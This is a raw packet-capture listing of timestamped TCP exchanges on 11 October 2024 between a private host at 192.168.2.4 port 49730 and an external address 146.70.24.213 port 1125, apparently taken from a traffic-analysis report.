                                                                                                                Oct 11, 2024 16:53:47.878236055 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.878249884 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.878277063 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.965677977 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.965718985 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.965728998 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.965775013 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.965785980 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.965796947 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.965807915 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.965820074 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.965866089 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.966160059 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966171980 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966183901 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966201067 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966202974 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.966213942 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966224909 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966229916 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.966253042 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966259956 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.966295958 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.966330051 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966341972 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966357946 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966368914 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966379881 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966382980 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.966392040 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966403961 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.966403961 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966418028 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966427088 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.966429949 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966456890 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.966516972 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966527939 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966540098 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966550112 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966561079 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966562986 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.966574907 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.966604948 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.966860056 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966878891 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966888905 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966918945 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.966960907 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966979027 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.966989994 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967000008 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967004061 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967024088 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967096090 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967107058 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967117071 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967128038 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967137098 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967138052 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967156887 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967185974 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967293024 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967317104 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967328072 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967338085 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967348099 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967355013 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967358112 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967369080 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967370987 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967387915 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967408895 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967411995 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967418909 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967430115 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967436075 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967451096 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967453957 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967466116 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967488050 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967506886 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967519045 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967529058 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967540026 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967550993 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967550993 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967577934 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967583895 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967592001 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967892885 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967905998 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967917919 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967928886 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967936993 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967940092 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967952013 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.967952013 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967964888 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.967981100 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968002081 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968041897 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968054056 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968065023 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968075037 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968086004 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968102932 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968117952 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968128920 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968128920 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968139887 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968149900 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968157053 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968173981 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968184948 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968189955 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968197107 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968208075 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968213081 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968219042 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968230009 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968240023 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968240023 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968269110 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968288898 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968478918 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968491077 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968501091 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968518019 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968528032 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968528986 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968539000 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968550920 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968556881 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968566895 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968578100 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968579054 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968589067 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968600035 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968606949 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968611002 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968621969 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968628883 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968632936 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968648911 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968648911 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968660116 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968671083 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968677044 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968682051 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968694925 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968708992 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968720913 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968791962 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968803883 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968815088 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968825102 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968830109 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968837976 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968848944 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968849897 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968859911 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968878984 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968899012 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.968914032 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968924999 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968935966 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.968971014 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.969012022 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.969022989 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.969033957 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.969043970 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.969048023 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.969054937 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:47.969075918 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:47.969104052 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057183027 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057197094 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057208061 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057218075 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057226896 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057243109 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057249069 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057260990 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057265043 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057281017 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057286024 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057292938 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057302952 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057312965 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057317019 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057322979 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057332993 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057333946 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057346106 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057356119 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057363987 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057364941 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057375908 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057380915 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057388067 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057404041 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057404995 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057416916 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057420969 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057426929 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057449102 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057460070 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057468891 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057473898 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057478905 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057486057 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057490110 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057503939 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057507992 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057518005 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057535887 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057555914 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057625055 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057733059 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057742119 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057751894 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057763100 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057774067 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057786942 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057872057 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057883024 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057893038 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057902098 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057909966 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057913065 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057923079 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057924032 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057934999 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057945013 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057951927 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057971954 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.057979107 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057988882 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.057998896 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058015108 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058029890 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058067083 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058078051 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058109045 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058403015 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058413029 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058423996 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058450937 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058466911 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058476925 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058485985 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058507919 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058509111 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058520079 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058526039 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058531046 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058554888 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058617115 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058628082 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058638096 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058646917 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058655977 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058660030 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058667898 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058671951 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058700085 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058754921 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058764935 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058775902 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058785915 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058794022 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058794975 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058806896 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058811903 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058818102 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058829069 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058835030 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058839083 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058850050 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058856964 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058867931 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058877945 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058887005 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058887005 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058900118 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058923960 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058923960 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.058985949 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.058996916 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059005976 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059015989 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059026003 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.059027910 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059039116 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059051037 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.059063911 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.059171915 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059181929 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059190989 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059201002 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059211016 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059212923 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.059221029 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059231043 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059238911 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.059238911 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059251070 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059259892 CEST497301125192.168.2.4146.70.24.213
                                                                                                                Oct 11, 2024 16:53:48.059262037 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059273958 CEST112549730146.70.24.213192.168.2.4
                                                                                                                Oct 11, 2024 16:53:48.059278965 CEST497301125192.168.2.4146.70.24.213
